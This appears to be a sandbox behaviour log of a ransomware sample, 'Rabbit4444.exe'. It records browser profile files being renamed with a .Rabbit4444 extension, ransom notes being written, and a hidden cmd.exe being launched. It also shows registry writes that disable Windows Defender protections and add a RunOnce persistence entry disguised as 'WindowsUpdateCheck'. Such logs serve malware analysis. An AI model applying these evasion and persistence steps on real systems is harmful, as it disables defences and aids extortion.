Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat type = size, size_out = 461 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js type = size, size_out = 8141 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 type = size, size_out = 14056 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db type = size, size_out = 16384 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json type = size, size_out = 288 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js type = size, size_out = 5171 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt type = size, size_out = 1822 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite type = size, size_out = 512 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json type = size, size_out = 29 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite type = size, size_out = 98304 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json type = size, size_out = 351 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata type = size, size_out = 46 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 type = size, size_out = 59 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite type = size, size_out = 122880 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata type = size, size_out = 29 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 type = size, size_out = 42 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite type = size, size_out = 49152 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js type = size, size_out = 7991 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 type = size, size_out = 14047 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt type = size, size_out = 479 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json type = size, size_out = 348 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib type = size, size_out = 2456 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info type = size, size_out = 116 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json type = size, size_out = 161 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json type = size, size_out = 51 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4 type = size, size_out = 3036 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4 type = size, size_out = 6489 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4 type = size, size_out = 5947 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4 type = size, size_out = 6538 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4 type = size, size_out = 6760 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 type = size, size_out = 66 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 type = size, size_out = 10 True 1
Fn
Move C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf.Rabbit4444 source_filename = C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-09\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
Move C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622.Rabbit4444 source_filename = C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622, flags = MOVEFILE_REPLACE_EXISTING True 1
Fn
For performance reasons, the remaining 2833 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (11)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager - True 1
Fn
Create Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\HomeGroup value_name = DisableHomeGroup, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableRealtimeMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce value_name = WindowsUpdateCheck, data = C:\Users\FD1HVy\Desktop\Rabbit4444.exe, size = 76, type = REG_SZ True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\WINDOWS\system32\cmd.exe os_pid = 0xcb8, show_window = SW_HIDE True 1
Fn
Module (2016)
»
Operation Module Additional Information Success Count Logfile
Load api-ms-win-core-synch-l1-2-0 base_address = 0x74ea0000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x74ea0000 True 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x74ea0000 True 1
Fn
Load kernel32 base_address = 0x75e90000 True 1
Fn
Get Filename - process_name = c:\users\fd1hvy\desktop\rabbit4444.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Rabbit4444.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = InitializeCriticalSectionEx, address_out = 0x74f97060 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsAlloc, address_out = 0x74f9bea0 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsSetValue, address_out = 0x74f92550 True 2
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = FlsGetValue, address_out = 0x74f870c0 True 1
Fn
Get Address c:\windows\syswow64\kernelbase.dll function = LCMapStringEx, address_out = 0x74f7ed00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x75ea4280 True 1
Fn
Create Mapping Z:\HOW TO BACK YOUR FILES.txt filename = Z:\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping Z:\System Volume Information\tracking.log filename = Z:\System Volume Information\tracking.log, protection = PAGE_READWRITE, maximum_size = 21248 True 1
Fn
Create Mapping C:\BOOTNXT filename = C:\BOOTNXT, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\HOW TO BACK YOUR FILES.txt filename = C:\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\bootsect.exe filename = C:\Windows10Upgrade\bootsect.exe, protection = PAGE_READWRITE, maximum_size = 119248 True 1
Fn
Create Mapping C:\Windows10Upgrade\DW20.EXE filename = C:\Windows10Upgrade\DW20.EXE, protection = PAGE_READWRITE, maximum_size = 644560 True 1
Fn
Create Mapping Z:\Recovery\HOW TO BACK YOUR FILES.txt filename = Z:\Recovery\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\boot.sdi filename = Z:\Recovery\WindowsRE\boot.sdi, protection = PAGE_READWRITE, maximum_size = 3171072 True 1
Fn
Create Mapping C:\Windows10Upgrade\DWTRIG20.EXE filename = C:\Windows10Upgrade\DWTRIG20.EXE, protection = PAGE_READWRITE, maximum_size = 46544 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\ReAgent.xml filename = Z:\Recovery\WindowsRE\ReAgent.xml, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\Winre.wim filename = Z:\Recovery\WindowsRE\Winre.wim, protection = PAGE_READWRITE, maximum_size = 491778272 True 1
Fn
Create Mapping C:\Windows10Upgrade\EnableWiFiTracing.cmd filename = C:\Windows10Upgrade\EnableWiFiTracing.cmd, protection = PAGE_READWRITE, maximum_size = 10592 True 1
Fn
Create Mapping C:\Windows10Upgrade\GatherOSState.EXE filename = C:\Windows10Upgrade\GatherOSState.EXE, protection = PAGE_READWRITE, maximum_size = 565712 True 1
Fn
Create Mapping C:\Windows10Upgrade\GetCurrentRollback.EXE filename = C:\Windows10Upgrade\GetCurrentRollback.EXE, protection = PAGE_READWRITE, maximum_size = 74192 True 1
Fn
Create Mapping C:\Windows10Upgrade\HttpHelper.exe filename = C:\Windows10Upgrade\HttpHelper.exe, protection = PAGE_READWRITE, maximum_size = 28624 True 1
Fn
Create Mapping C:\Windows10Upgrade\PostOOBEScript.cmd filename = C:\Windows10Upgrade\PostOOBEScript.cmd, protection = PAGE_READWRITE, maximum_size = 1360 True 1
Fn
Create Mapping C:\Windows10Upgrade\upgrader_default.log filename = C:\Windows10Upgrade\upgrader_default.log, protection = PAGE_READWRITE, maximum_size = 250960 True 1
Fn
